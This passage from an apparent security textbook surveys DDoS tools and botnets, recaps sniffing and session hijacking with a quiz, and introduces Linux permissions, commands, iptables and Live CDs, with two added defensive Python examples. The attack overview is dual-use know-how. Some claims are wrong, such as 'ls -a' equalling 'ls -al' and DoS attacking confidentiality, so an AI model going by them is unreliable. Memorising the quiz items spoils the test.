• Daemon software — This software is resident on the infected systems or bots. This software is installed on a victim and then waits for instructions to be received. If you have software of this type installed, you are the one actually attacking a system.

The second requirement that is essential is the hardware; more specifically, these are the systems that will be components of the attack:

• Master or control system — The system responsible for sending out the initial messages to start the attack; also the system that has the client software present and installed.
• Zombie — The system that is the one carrying out the attack against the victim. The number of zombies can vary wildly.
• Target — The system that is the actual victim or recipient of the attack.

You may be wondering whether, all things considered, a DDoS is unstoppable. DDoS attacks rely on locating and using vulnerable hosts that are connected to the Internet. These systems are then targeted for these known vulnerabilities and taken over. Once the attack is initiated and the command sent out to the attackers, the DDoS is nearly impossible to stop. Routers and firewalls may be configured to block the attack, but the attack can overwhelm these devices and shut down the connection anyway. The sheer volume of attackers involved in DDoS attacks makes them difficult to stop.

Tools for DDoS

To initiate a DDoS requires the proper tools, and there are a number available.
The tool or tools you use will ultimately depend on what your preferences are as well as other factors such as platform, but the following list is a sampling of these tools:

• Tribal Flood Network (TFN) — TFN can launch ICMP, Smurf, UDP, and SYN flood attacks at will against an unsuspecting victim. TFN has the distinction of being the first publicly available DDoS tool.
• Trinoo — Trinoo can claim to be the first widely used DDoS application, largely because it is easy to use and has the ability to command and control many systems to launch an attack.
• Stacheldraht — The best of both worlds is available in this tool, which offers features that are seen both in Trinoo and TFN. Stacheldraht uses TCP and ICMP to send commands and control its agents in order to attack. This software also includes what could be considered advanced features in the form of encrypted communication from client to handlers.
• TFN2K — An upgrade to TFN, it provides some more advanced features including spoofing of packets and port configuration options. As opposed to TFN, this software does include encryption features, but not as strong as those of Stacheldraht.
• WinTrinoo — This software is a Windows port of Trinoo and has the ability to use Windows clients as drones.
• Shaft — This works much the same way as Trinoo, but includes the ability for the client to configure the size of the flooding packets and the duration of attack.
• MStream — This utilizes spoofed TCP packets to attack a designated victim.
• Trinity — This performs several DDoS functions, including fraggle, fragment, SYN, RST, ACK, and others.

Botnets

An advanced type of attack mechanism is a botnet, which consists of systems that are infected with software such as those used in DDoS attacks. When enough of these systems are infected, and a critical mass has been reached, it is possible to use these machines to do tremendous damage to a victim.
Botnets can stretch from one side of the globe to another and be used to attack a system or carry out a number of other tasks. Botnets can perform several attacks, including:

• DDoS — This construct makes sense as an attack method based on the way a DDoS works and the number of systems that can be infected.
• Sending spam — Botnets have been used to transmit spam and other bogus information on behalf of their owner.
• Stealing information — Attacks have also been carried out with botnets to steal information from unsuspecting users' systems.
• Clickfraud — This attack is where the attacker infects a large number of systems with the idea that they will use the infected systems to click on ads on their behalf, generating revenue for themselves.

NOTE
Remember that a botnet can easily number into the hundreds of thousands or millions of systems, stretching from one end of the globe to another. With these kinds of numbers, the attacks noted here take on a new meaning and destructive capability.

A "bot" is a type of malware that allows an attacker to take control over an affected computer. Also known as "Web robots," bots are usually part of a network of infected machines known as a "botnet," which is typically made up of victim machines that stretch across the globe.

FYI
The following is a clipping from an FBI news briefing: "... the Department of Justice and FBI announced the results of an ongoing cyber crime initiative to disrupt and dismantle 'bot-herders' and elevate the public's cybersecurity awareness of botnets. OPERATION BOT ROAST is a national initiative. Ongoing investigations have identified over 1 million victim computer IP addresses." http://www.fbi.gov/pressrel/pressrel07/botnet061307.htm

CHAPTER SUMMARY

This chapter focused on three types of network attacks: sniffing, session hijacking, and DoS attacks.
Each of these attacks represents a powerful weapon in the hands of a skilled attacker. Sniffing is the process of capturing and analyzing traffic in an effort to observe information that is confidential. Sniffing can be performed on just about any network, but the technique may require that you adapt based on how the network operates. In networks with a hub, you can easily sniff using any packet sniffer and starting the process. On networks that use switches, however, it is different, as the switch prevents you from seeing what is on a different collision domain. On networks where switching is used, you will have to use techniques such as MAC flooding and ARP spoofing to bypass the switch prior to sniffing.

Moving beyond or building upon the techniques that were introduced in sniffing is the session hijack, which is an aggressive and powerful weapon in the hacker's arsenal. A session hijack takes over an existing authenticated session and uses it to monitor or manipulate the traffic, and even execute commands on a system remotely. Session hijacking in its most advanced stages directly affects and attacks the integrity of information in an organization. An attacker using this technique can modify information at will, as they have the credentials of the victim and whatever the victim has access to.

DoS attacks were discussed and you learned how these attacks are used to shut down and deny legitimate access to and usage of services to users. A DoS is used to target a service or system and prevent it from being used for legitimate uses for as long as the attacker wishes. Under the right conditions, a DoS directly attacks the confidentiality and integrity of data that users have been granted the right to use.
KEY CONCEPTS AND TERMS

Active session hijacking
Active sniffing
Address Resolution Protocol (ARP) poisoning
Botnet
Collision domain
Content addressable memory (CAM)
Fail-open
Hub
Lookup table
Passive session hijacking
Passive sniffing
Promiscuous mode
Session hijacking
Switch

CHAPTER 12 ASSESSMENT

1. A DoS is meant to deny a service from legitimate usage.
   A. True
   B. False
2. Sniffers can be used to:
   A. Decrypt information
   B. Capture information
   C. Hijack communications
   D. Security enforcement
3. Session hijacking is used to capture traffic.
   A. True
   B. False
4. Session hijacking is used to take over an authenticated session.
   A. True
   B. False
5. Active sniffing is used when switches are present.
   A. True
   B. False
6. ________ is used to overwhelm a service.
7. ________ is used to flood a switch with bogus MAC addresses.
8. ________ is used to fake a MAC address.
   A. Spoofing
   B. Flooding
   C. Poisoning
   D. Hijacking
9. What type of device can have its memory filled up when MAC flooding is used?
   A. Hub
   B. Switch
   C. Router
   D. Gateway
10. What technique is used when traffic is captured on a network with hubs?
   A. Active sniffing
   B. Passive sniffing
   C. MAC flooding
   D. Killer flooding

CHAPTER 13
Linux, Live CDs, and Automated Assessment Tools

IN TODAY'S BUSINESS ENVIRONMENT, it is likely that you will encounter operating systems other than the familiar Windows desktop. While Windows still lays claim to a large segment of the computers in the world, it is not the only operating system out there. Operating systems (OSs) such as the Mac OS, UNIX, and Linux are likely to cross your path at some point. As a security professional, it is important for you always to have an understanding of the tools available to you, and in the security field this requires some knowledge of the Linux OS.
Linux is different from Windows and will require some effort from you to learn, but once it is learned you will have many more tools available to you through which you can assess the security of your organization. Linux offers a tremendous number of benefits (the least of which is that it is free; most important is the amount of tools that will become available to you). Linux offers benefits that Windows just cannot offer, such as Live CDs. Linux is one of the very few OSs that can be run off of removable media such as flash drives, CDs, DVDs, and portable hard drives. Linux can be booted off removable media without being installed on a hard drive or on a computer, eliminating the need to make changes to the computer itself.

Chapter 13 Topics

This chapter covers the following topics and concepts:

• What Linux is
• What users, groups, and special accounts are
• What working with permissions in Linux is
• What commonly used commands are
• What ipchains and iptables are
• What Live CDs are
• What automated assessment tools are

Chapter 13 Goals

When you complete this chapter, you will be able to:

• List the features of Linux
• Discuss the benefits of Linux
• Describe the benefits of Live CDs
• Describe the benefits of automated assessment tools
• Describe the types of automated assessment tools

NOTE
Linux was originally designed and created by Linus Torvalds in 1991 with the help of programmers and developers around the world. Since 1991, the operating system has rapidly evolved from a computer science project to a very usable mainstream operating system.

Linux

This chapter moves away from Windows to discuss Linux, which has a great deal in common with an older operating system, UNIX. Linux offers many of the benefits you would expect in any modern operating system, but a little differently from what you may be used to. The first difference is that it is open source, meaning that anyone can browse the source code.
This design offers a degree of transparency that is not observed in other operating systems that are closed source, such as Windows.

FIGURE 13-1 Linux KDE Desktop.

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools 301

Do not confuse free and open source, because the two terms are not interchangeable. Free means just that: no charge. Vendors can choose to charge for their version of Linux if they so choose; however, this charge usually means that they are charging for support instead of for the product itself. A good example of this is SUSE and OpenSUSE: OpenSUSE is a free version, and SUSE is Novell's fee-based version. Open source means that the source code is available for perusal by anyone. By the terms of the GPL, anyone who makes available their own version of Linux through customization or other means must also make available the source code for public review.

While Linux is a largely free and open source operating system, it is still powerful and useful. Linux is in fact a very complete operating system that offers graphical user interfaces (GUIs) that are easy to use and work with. Linux has also shown the ability to be very flexible and portable, running on a wide range of hardware and devices, all offering similar or exactly the same features and capabilities. Figure 13-1 shows one possible interface for Linux.

Linux is available in many different variations, known as distributions, available from many different vendors. These distributions vary in style, features, performance, and usage, with some being purposefully built for a specific situation. A common misconception is that Linux is always free. In fact it is not always; some distributions do have an associated fee to purchase them, much like Windows. However, they still make their source code available under the General Public License (GPL).
Some of the more common distributions of Linux include:

• Ubuntu
• Kubuntu
• OpenSuSE
• Fedora
• Debian
• Slackware
• MEPIS

NOTE
Linux offers several different graphical interfaces including KDE, Gnome, Fluxbox, and Lightbox. Conversely, Linux also can be entirely command line based with no corresponding GUI.

NOTE
Currently there are more than 2,000 distributions of Linux available in different forms and formats. While most of these distributions are very specialized, it does demonstrate the large number of distributions available and the overall flexibility of the operating system.

At the heart of every operating system is the kernel, which is its core component. It has control over all the low-level system functions such as resource management, input and output operations, and the central processing unit (CPU). The kernel can be said to dictate the very behavior of the operating system itself in most cases. Each of these kernels is built for the specific environment and operating system. In the case of Linux, there are multiple versions that are in use across different distributions that in some cases are customized. This also shows one of the unique features of Linux and the Linux kernel: Linux, unlike Windows, can have its kernel configured by anyone wishing to take the time (and having the knowledge) to do so.

You will not be interacting with the kernel directly; you will be interacting with it only through the use of a shell, which is the interface that is either command line- or graphical-based. The shell also interacts with devices such as hard drives, ports, the central processing unit (CPU), and other types of devices.

NOTE
There are many different shells available for the Linux platform. It is up to you to choose what is best suited and most comfortable for you. Examples of shells that are in use are Bash, csh, and tcsh. Others are available in Linux distributions as well. The choice is yours about which is preferable, and any can generally be used with little or no loss in functionality.

A Look at the Interface

Linux can be used in two different ways: through the command line or through a GUI. In the Windows world, both options are available as well, but most people use the GUI and never think about the command line. In the Linux world, it is not uncommon for users to use both; in fact some advanced or hard-core users don't use the GUI at all, opting to use the command line instead. One of the biggest misconceptions about Linux is that you can only use the command line to operate it. While it is true that the command line may indeed be the only way to do more advanced operations, it is not your only option. In fact, Linux has had to introduce more advanced and usable interfaces as it has become more popular and widely adopted.

There are plenty of people who still believe that the only way to use Linux is to roll up your sleeves and get intimately familiar with the command line, but this is not the case. Many tools that you will use as a security professional now have GUIs that make them much easier to use. Of course, don't let this become a crutch, because a good understanding and comfort level with the command line is essential for you to be successful with Linux.

Basic Linux Navigation

One of the biggest differences you will notice in the Linux operating system if you are transferring in from Windows is how drives are referenced. In Linux, unlike Windows, drive letters are not used. Instead, drives and partitions are referenced by using a series of filenames in the format:

/dev/hda1/file

Another difference that exists between Windows and Linux is how directories are annotated. In Windows, directories are referenced with the familiar "\", but in Linux the directories are "/". If anything is going to cause you grief as a Windows user moving to Linux, this is probably it.

Important Linux Directories

When navigating the many different directories in the Linux file system, you will need to have a good knowledge of the different directories and what they provide to the user. Table 13-1 lists some of the vital directories in the Linux file system. Awareness of these built-in directories allows administrators to monitor known expected files and directories and detect rogue files that have been either accidentally placed in sensitive directories or maliciously planted to trap unsuspecting system users.

TABLE 13-1 Linux directories and purposes.

DIRECTORY   PURPOSE
/           This represents the root of the file system. This is similar in some respects to the location C:\ in Windows.
/bin        All executables in this directory are accessible and usable by all system users. This can be considered to be more or less like the Windows folder in the Windows operating system.
/boot       Contains all the files that are required to start up and boot a Linux operating system.
/dev        Location where the files that dictate the access between hardware and the operating system reside. These can be thought of as drivers and similarly related files.
/etc        Configuration files for the system and for applications are located in this folder. Applications can also store some configuration information in their own directories.
/home       This location is where the users will store their information by default. Typically their information is stored in per-user subdirectories underneath this folder.
/lib        Library files (mostly C programming language object files) can be found here. Libraries are shared code that is incorporated into an application later on demand. Applications and the OS store their library files in this location by default.
/mnt        Certain nonpermanent file systems (floppies, CD-ROMs, nfs) are normally placed here when a device is activated. Example: when you place a CD into the CD-ROM drive, the OS may mount (connect to) the CD file system and display the directories and files under /mnt/cdrom.
/opt        This directory is used at the administrator's discretion (optional) but it is typically used for third-party software.
/proc       This directory contains vital information about running processes on the Linux system.
/root       The home directory of the root user is contained in this special directory away from normal users.
/sbin       The system binaries directory contains executables that are used by the OS and the administrator, not typically by normal users.
/tmp        A temporary directory for general use by any user.
/usr        Generic directory that contains the body of useful folders and files for use by Linux users such as executables and documentation.
/var        Important directory that contains system variables such as print and mail spoolers, log files, and process IDs.

Users, Groups, and Special Accounts

Linux is an operating system that is designed around a multiuser model. This design gives Linux the ability to have more than one user logged in and actively using the system at any particular time. This makes it necessary for each user to have an individual user account and home directory to store information. Linux also allows for different user accounts to be assigned different privileges for different access levels. All Linux users on a particular system have an associated user ID, belong to a group, and have a unique identification number referred to as a UID (user ID).
Working with user accounts are groups, which are used to assign privileges collectively to multiple users. For example, grouping users into units that reflect job functions or desired access such as accounting, sales, or development would allow for quick and easy assignment of privileges. With a group you can place users with the same desired level of access in a group and give that group access instead. Groups are generally a way to put users together in a logical organization that is used to assign common access privileges and to simplify administration.

In Linux, system users gain access to a system only after a special account known as the root user, or superuser, has created user accounts and given these user accounts access. The root user is a very special and unique account because it is the account that has complete and unrestricted access to all commands, files, and other system components. The superuser or root account is created on all Linux systems when the operating system is installed. The root account is the account that must be used to create user accounts, create groups, assign permissions, and perform other sensitive system actions. Only the root user can add new groups and users. The new accounts define the user's environment and level of access. New users may be created by doing the following:

• Adding entries in the /etc/passwd file for the user
• Creating a home directory for the user name (/home/<user_name>)
• Assigning a default login shell

NOTE
The root or superuser account should be used only by those who are more experienced with the system and understand the consequences of using the account. Unlike with the Windows operating system, in which it is not unheard of for users to log in as an administrator to perform tasks, in Linux users are discouraged from using the root account directly. It is normally accessed only from another account for selected actions. In some versions of the Linux operating system, such as Ubuntu, the root account is disabled and cannot be logged into directly. This requires the user to run commands from another account and selectively grant root access as needed.

Working with Permissions

Every file and folder that resides on the hard drive of a Linux system has an associated set of permissions. These permissions dictate how a particular item may be interacted with and by whom. Specifically, in Linux access is granted to three types of users that dictate the level of access that will be permitted. The following are the types of users associated with every file:

• Owner — Owner (U) of a file is the individual or user account who generated the file.
• File group — Group (G) is the group the owner was logged in under while creating the file; all users that belong to the file's group have a common level of access to the file.
• Others group — Others (O) group refers to all users on the system other than the owner and the file's group members.

Files and directories also have three types of permissions associated with them:

• Read permission allows users to view a file, but not change or alter the file in any way. Read permission on a directory allows users to view the directory's contents, but does not permit changes to the directory contents.
• Write permission allows users to modify and save files, and add or delete files in directories.
• Execute permission allows users to execute a file such as with a command. If applied to a directory, the permission will allow access to files within the directory.

TABLE 13-2 Representation of letters for Linux.
d        Item type
r w x    Owner: Read, Write, Execute
r w x    Group: Read, Write, Execute
r w x    Other: Read, Write, Execute

In order to view the permissions assigned to each type of user for all the files located in a directory, issue the long listing option (-l) of the ls command:

[LinuxUser]~$ ls -l
total 18
drwxr-xr-x  2 Link None    0 Nov 26 18:11 Java
-rw-r--r--  1 Link None   57 Nov 24 21:21 errors
-rw-r--r--  1 Link None   55 Nov 24 21:25 errors.txt
-rw-r--r--  1 Link None 8728 Nov 24 20:19 lsinfo.txt
-rwxr-xr-x  1 Link None   43 Nov 26 01:42 myScript
[LinuxUser]~$

The preceding string of letters for each entry represents the permissions that
correspond to each user or group:

drwxr-xr-x

NOTE

In some cases, a hyphen
may appear in any of the
permission fields and in this
case the system is stating that
the user has no permissions
of that type.

Table 13-2 illustrates what each letter represents, left
to right. Reading the permissions left to right indicates
the following:

• The type of file (d for a directory)
• The next three represent the user's permissions
• The next three positions indicate the group permissions
• The last three represent the access provided
to everyone else.

Another example is:
drwxr-xr-x

This folder allows read, write, and execute permissions for the owner, but only read
and execute for the group and for other users.
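As an added example that is not part of the book, the following Python script decodes the symbolic mode strings shown above into the three user classes of Table 13-2, converts each to the octal form that chmod uses, and flags entries an administrator reviewing a listing would want to look at twice (world-writable items and setuid/setgid programs). The listing it parses is constructed to resemble the chapter's ls -l output; the setuid "helper" and the sticky "scratch" directory are invented for the demonstration.

```python
"""Decode ls -l permission strings (added example, not from the book)."""
import re
from dataclasses import dataclass

# Constructed sample in the same shape as the chapter's `ls -l` listing.
SAMPLE_LISTING = """\
total 18
drwxr-xr-x  2 Link None    0 Nov 26 18:11 Java
-rw-r--r--  1 Link None   57 Nov 24 21:21 errors
-rwxrwxrwx  1 Link None   55 Nov 24 21:25 errors.txt
-rwsr-xr-x  1 root root 8728 Nov 24 20:19 helper
drwxrwxrwt  2 root root    0 Nov 26 01:42 scratch
"""

CLASSES = ("owner", "group", "other")          # Table 13-2, left to right
TYPE_NAMES = {"-": "file", "d": "directory", "l": "symlink",
              "c": "char device", "b": "block device",
              "p": "fifo", "s": "socket"}


@dataclass
class Entry:
    name: str
    kind: str
    perms: dict       # class -> set of "r", "w", "x"
    setuid: bool
    setgid: bool
    sticky: bool
    octal: str        # four-digit chmod form, e.g. "0755"


def parse_mode(mode):
    """Decode a 10-character mode string such as 'drwxr-xr-x'.

    Returns (kind, perms, setuid, setgid, sticky).  In the execute slot,
    ls prints 's'/'S' (owner, group) for setuid/setgid and 't'/'T' (other)
    for the sticky bit; lowercase means the execute bit is also set.
    """
    if len(mode) != 10 or mode[0] not in TYPE_NAMES:
        raise ValueError("not a mode string: %r" % mode)
    perms = {}
    setuid = setgid = sticky = False
    for idx, cls in enumerate(CLASSES):
        r, w, x = mode[1 + idx * 3: 4 + idx * 3]
        bits = set()
        if r == "r":
            bits.add("r")
        if w == "w":
            bits.add("w")
        if x in "xst":
            bits.add("x")
        if x in "sS" and cls == "owner":
            setuid = True
        elif x in "sS" and cls == "group":
            setgid = True
        elif x in "tT" and cls == "other":
            sticky = True
        perms[cls] = bits
    return TYPE_NAMES[mode[0]], perms, setuid, setgid, sticky


def to_octal(perms, setuid, setgid, sticky):
    """Convert parsed permissions to the numeric form chmod accepts."""
    special = (4 if setuid else 0) + (2 if setgid else 0) + (1 if sticky else 0)
    digits = ""
    for cls in CLASSES:
        p = perms[cls]
        digits += str((4 if "r" in p else 0) + (2 if "w" in p else 0)
                      + (1 if "x" in p else 0))
    return "%d%s" % (special, digits)


# mode, link count, owner, group, size, month, day, time-or-year, name
LINE_RE = re.compile(
    r"^(?P<mode>[-dlcbps][rwxsStT-]{9})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\w{3}\s+\d+\s+[\d:]+\s+(?P<name>.+)$")


def parse_listing(text):
    """Turn the text of an `ls -l` listing into Entry objects."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:                      # skips "total N" and unparseable lines
            continue
        kind, perms, su, sg, st = parse_mode(m["mode"])
        entries.append(Entry(m["name"], kind, perms, su, sg, st,
                             to_octal(perms, su, sg, st)))
    return entries


def findings(entries):
    """Return (name, reason) pairs for entries worth a second look.

    A world-writable directory with the sticky bit (like /tmp) is the
    normal pattern and is not reported.
    """
    out = []
    for e in entries:
        if "w" in e.perms["other"] and not (e.kind == "directory" and e.sticky):
            out.append((e.name, "world-writable"))
        if e.setuid or e.setgid:
            out.append((e.name, "setuid/setgid"))
    return out


if __name__ == "__main__":
    for entry in parse_listing(SAMPLE_LISTING):
        print(entry.octal, entry.kind, entry.name)
    print(findings(parse_listing(SAMPLE_LISTING)))
```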


Commonly Used Commands

Because of the many tasks that can be performed within a command line or terminal
window, it is vital for you to understand terminal windows and the frequently used
commands. This will require using the knowledge that you acquired earlier of filenames,
directory names, and commands that are case sensitive. When at the Linux command
line, you will see a command prompt similar to what is shown here:

[root@impa /]#

This command prompt indicates the user account logged in (in this case, root), the
computer name (in this case, impa), along with the current directory (in this case, /).
The # symbol at the prompt indicates that the user account holds root privileges, whereas
a prompt that ends with $ indicates a user account with standard privileges.

Basic Command Structure

Linux commands share a common form, which is the following:

command <option(s)> <argument(s)>

The command identifies the command you want Linux to execute.

• The name of a command generally consists of lowercase letters and digits.

• Options modify the way a command works. For example, the -a option
of the ls command generates the output of the command to list "hidden" files
as well as normal files.

root@linuxhost:/# ls -a

is the same as

root@impa:/# ls -al

FYI

The majority of Linux commands are case sensitive and you should pay very close attention
to this fact. A command that is entered in uppercase versus lowercase versus mixed case
is not the same command. For example, look at the ls command:

• Ls
• LS
• ls

Each of these is considered a different command by the operating system and each will
be interpreted differently.

This behavior is different from Windows, where case doesn't matter the majority of the time.


TABLE 13-3 Linux commands.

COMMAND   PURPOSE

ls
The list command is similar to the dir command in Windows, with very similar
options. The ls command is used to display all the files and subdirectories
in a given location.

pwd
The print working directory command is similar to the cd command in Windows.
It is used to display the current location the user is in within the Linux directory
structure. This command is very useful, especially for the newbies that can get
lost in the Linux file system quite quickly.

pwd

cd
The change directory command is used to switch between locations in Linux.
This command is identical in operation to the Windows version. The main
difference is the way directories are referenced (remember your slashes).

Important shorthand notations include these:

root of file system: /
current directory: ./
parent directory (the preceding directory): ../
home directory: ~

cd <path>

mkdir
Make directory is a command used to create new directories in Linux.
The format is as follows:

mkdir <new directory name>

rmdir
Remove directory is a command that is used to remove or delete empty
directories from the Linux file system. This is the key point, empty; the directory
must be empty or the command will fail.

rmdir <directory name>

rm
A more aggressive removal command that removes files or folders. The difference
between this command and the rmdir command with respect to directories is
that this command will remove a directory that is not empty. When using this
command on directories, exercise caution.

rm <filename>

cp
A command that is used to copy files from location to location, much like the
copy commands in other operating systems.

cp <original location> <new location>

mv
The mv command is used to move files from one location to a new location.

mv <original location> <new location>

CHAPTER 13 Linux, Live CDs, and Automated Assessment Tools

309

The next detail in commands is the arguments that are used to
specify filenames or other targets that fine-tune or tweak the action
of the command. For example, the ls command lets you specify a
directory as an argument, which causes the command to list files
in that particular directory:

root@impa:/# ls /bin

NOTE

Some commands provide the ability to specify a series of arguments; in these situations
you must separate each argument with a space or tab.

Table 13-3 lists a small number of the commands in Linux,
but you should become comfortable with all of them, including
their functions.

Ipchains and Iptables

The Linux operating system offers several tools for controlling traffic to and from a system,
including ipchains and iptables.

Ipchains is an early firewall technology for Linux that controls traffic by checking packets.
Packets encountering the ipchains technology will enter a set of rules known as a chain.
The packet is checked against these rules to see if it matches any known behaviors that
would be considered malicious or incorrect. Traffic that is analyzed and shown to be
suspicious will be dealt with accordingly, and traffic that is permitted will be sent on to the
system to make what is known as a routing decision. The decision that is made will be based
on whether the destination for the packet is attached to the device or is remote. A packet for a
local device will be sent to the appropriate interface on the device; in the event the destination
is remote, it will be forwarded to a forward chain before being sent on to an output chain
and on toward its destination.

So what are chains? Ipchains are made up of rules, and each rule is composed of a
set of definitions that specifies which packets must match it and what to do if the packet
matches the rule. Every packet that arrives at or departs a computer will be processed by
at least one chain, and each rule on the chain will be compared with the packet. If one
matches the packet, the process stops, and the rule is read to determine what to do with
the packet. When a packet traverses a whole chain and no match is found, a policy defined
for the chain is followed that dictates what to do with the packet.

One of the problems with ipchains is simplicity; the process described here is complex
and time-consuming to perform on each packet. In response to this, a new packet-filtering
framework known as netfilter was designed with the goal of simplifying and improving
the process of packet filtering. Netfilter introduced cleaner packet filtering as well as
improved flexibility compared with ipchains.


FYI

Iptables is a utility used to set up, maintain, and inspect the packet-filtering rules in Linux. Iptables
handles packets in two ways: chains and tables. A chain is a set of rules that tells iptables how
to manipulate a packet that matches a given rule. Even with no user-defined iptables statements
on your router, each packet passing through the router will flow through at least one of the three
predefined chains in the operating system:

Iptables

Iptables is the successor to ipchains and introduces a more efficient method of processing
packets than ipchains offers. Iptables builds on the technology introduced in netfilter and
uses some of the modules of the software to make a more robust technology. Iptables and
ipchains both process packets, but iptables goes one step further than ipchains. Although
ipchains uses rules arranged in a list or chain, iptables builds on this by adding tables
to the mix. Iptables uses these tables to decide how to handle a packet, whether it is to
perform network address translation (NAT) or some other type of filtering on the data.
As opposed to chains alone, this table format allows for a much greater degree of flexibility than
ipchains because the ability to filter packets is more dynamic. Furthermore, the changes
introduced in iptables mean that a packet will pass through only one filtering point
during its processing, as opposed to ipchains, in which a packet can pass through multiple
points on its journey across the network.
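As an added illustration of the chain traversal described above (example code written for this page, not from the textbook or from any firewall implementation), the following Python simulates chains of rules, first-match processing, fall-through to a chain policy, jumps into a user-defined chain, and the ipchains-style input/routing/forward/output path. The rule fields, packet dictionaries, chain names, addresses and the sample rule set are all constructed assumptions.

```python
import ipaddress
from dataclasses import dataclass, field
from typing import Optional

ACCEPT, DROP, RETURN = "ACCEPT", "DROP", "RETURN"


@dataclass
class Rule:
    """One rule: match criteria plus a target (a verdict or the name of a user chain)."""
    target: str
    proto: Optional[str] = None   # "tcp", "udp", "icmp"; None matches any protocol
    src: Optional[str] = None     # source network in CIDR notation; None matches any
    dport: Optional[int] = None   # destination port; None matches any

    def matches(self, pkt: dict) -> bool:
        if self.proto is not None and pkt["proto"] != self.proto:
            return False
        if self.src is not None and ipaddress.ip_address(pkt["src"]) not in ipaddress.ip_network(self.src):
            return False
        return self.dport is None or pkt.get("dport") == self.dport


@dataclass
class Chain:
    """An ordered list of rules; built-in chains also carry a policy for unmatched packets."""
    name: str
    rules: list = field(default_factory=list)
    policy: Optional[str] = None  # None for user-defined chains: hand control back to the caller


class Firewall:
    def __init__(self, *chains: Chain) -> None:
        self.chains = {c.name: c for c in chains}

    def traverse(self, chain_name: str, pkt: dict, trace: list) -> Optional[str]:
        """Walk one chain: the first matching rule decides; with no match the policy applies.
        The trace records which rule (or policy) was consulted, e.g. "input:0"."""
        chain = self.chains[chain_name]
        for idx, rule in enumerate(chain.rules):
            if not rule.matches(pkt):
                continue
            trace.append(f"{chain_name}:{idx}")
            if rule.target in (ACCEPT, DROP):
                return rule.target
            if rule.target == RETURN:
                return None
            # Any other target names a user-defined chain: jump into it, and continue
            # down this chain only if it returns without a verdict.
            verdict = self.traverse(rule.target, pkt, trace)
            if verdict is not None:
                return verdict
        trace.append(f"{chain_name}:policy")
        return chain.policy

    def process(self, pkt: dict, local_addrs: set) -> tuple:
        """ipchains-style path from the text: input chain, routing decision, then the
        forward and output chains for packets not destined to this host."""
        trace: list = []
        if self.traverse("input", pkt, trace) == DROP:
            return DROP, trace
        if pkt["dst"] in local_addrs:
            return ACCEPT, trace          # delivered to a local process
        for name in ("forward", "output"):
            if self.traverse(name, pkt, trace) == DROP:
                return DROP, trace
        return ACCEPT, trace


def build_sample_firewall() -> Firewall:
    """Constructed rule set (an assumption for this example, not a recommendation)."""
    return Firewall(
        # user-defined chain: SSH only from the admin network, everything else dropped
        Chain("mgmt", rules=[Rule(ACCEPT, src="10.0.0.0/24"), Rule(DROP)]),
        Chain("input", policy=ACCEPT, rules=[
            Rule("mgmt", proto="tcp", dport=22),   # jump to the mgmt chain
            Rule(DROP, proto="tcp", dport=23),     # no telnet to or through this host
        ]),
        Chain("forward", policy=DROP, rules=[
            Rule(ACCEPT, proto="tcp", dport=80),
            Rule(ACCEPT, proto="tcp", dport=443),
        ]),
        Chain("output", policy=ACCEPT),
    )


def check(pkt: dict) -> tuple:
    """Return (verdict, trace) for one packet; 192.0.2.10 is this host's constructed address."""
    return build_sample_firewall().process(pkt, {"192.0.2.10"})


if __name__ == "__main__":   # run stand-alone to see the trace for one constructed packet
    print(check({"proto": "tcp", "src": "10.0.0.5", "dst": "192.0.2.10", "dport": 22}))
```

The trace shows where processing stopped: a rule index when a rule matched, or "policy" when the packet fell off the end of a chain.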

Live CDs

Something that is available in Linux that is somewhat unusual is a Live CD. Live CDs
are pieces of media that contain a complete and bootable operating system. This is
very different from the way items such as boot floppies were in the past. In the case
of boot floppies, a completely functional operating system was just not possible,
except in the early days of Direct Operating System (DOS). With a Live CD, you can run an
operating system that is fully featured and functional, and gives the same experience as
the operating system when it is installed on the hard drive of a computer. For all intents
and purposes, in this course you can say that just about every distribution of Linux is
available in a Live format, with few exceptions.

FYI

Don’t let the term Live CD fool you; you can run these live distributions off of any type of media,
including CDs, DVDs, portable hard drives, and USB flash drives. In fact, an increasing number
of Linux users are installing live distributions on high-capacity flash drives on which they can store
the entire operating system, all applications, and their data. When installed on a flash drive in
this manner, you can literally carry your entire desktop from system to system and have the same
experience no matter where you go.

One of the bigger benefits of a Live CD is that you can boot a computer off a Live CD
and not make any alterations to the existing operating system on the computer’s hard
drive. When running a Live CD, the computer boots off the given media and uses the
operating system that is running totally off the removable media. This can be useful for
evaluating the operating system prior to making changes to the computer in any way.
You could also use this for evaluating hardware support and compatibility. You can also
use a Live CD to troubleshoot hardware (for example, when a piece of hardware fails) or
to recover a corrupted operating system.

Other common uses of live distributions include:

• Installing Linux on a new system
• Testing new software
• Evaluating different hardware configurations
• Repairing damaged systems
• Guest systems
• Portable systems
• Pentesting
• Multiboot
• Forensics
• Providing a secure, non-alterable operating system
• Kiosks
• Persistent desktops

As with most live distributions, the ability to return the system to whatever state it
happened to be in prior to the installation is standard. The process is simple: Boot off the
live media and use the operating system; when you are done, shut down the operating
system, eject the media, reboot, and you are back where you started. The downside of
live distributions is performance; because the entire operating system is being run from
physical memory, the performance will be less than if it were installed on the physical
hard drive. Essentially the entire operating system is running from random access
memory (RAM) along with all the applications, which means less RAM to go around.
However, the amount of RAM required for Linux is quite low, with some Linux distributions
being able to run in as little as 32 MB of memory.


FYI

When evaluating Linux as a live distribution, always factor in this performance penalty.
Live distributions run everything from physical memory, and anything that is not in memory
will have to be retrieved from the physical media (such as the CD). Because media such as
CDs and DVDs will be slower than a hard drive, you will notice a lag for features you have
not accessed previously (this lag will be less on flash drives).

While the majority of Live CDs are designed for you to test drive an operating system,
there are CDs designed for other uses. Live CDs are available that are used for forensic
purposes, malware removal, system recovery, password reset, and other uses.

Although the majority of Live CDs can run in memory to free the optical drive or other
media for other uses, loading the data off of a CD-ROM will always be slower than a hard
drive-based installation. With larger operating systems there will be a substantial penalty
incurred while the required information is loaded off the media, but with smaller images,
loading the entire image into physical memory provides substantial performance benefits
because RAM is much faster than a hard drive.

Special Purpose Live CDs

Live CDs can be generic or very specific and purpose-built.
Purpose-built CDs are different from other, more commonly found
live distributions in that someone built them with a very unique
purpose or need in mind. In the case of regular Live CDs, the live
distribution provides all the information needed to run a regular
operating system and even provides the ability to install the OS.
In the case of purpose-built CDs this may not be true; in fact, some
of the Linux distributions (distros) may not even have the ability
to install.

Some examples of purpose-built distributions include:

• Firewalls
• Rescue disks
• Password reset (such as Trinity)

NOTE

Typically, purpose-built distributions of this type include firewall applications,
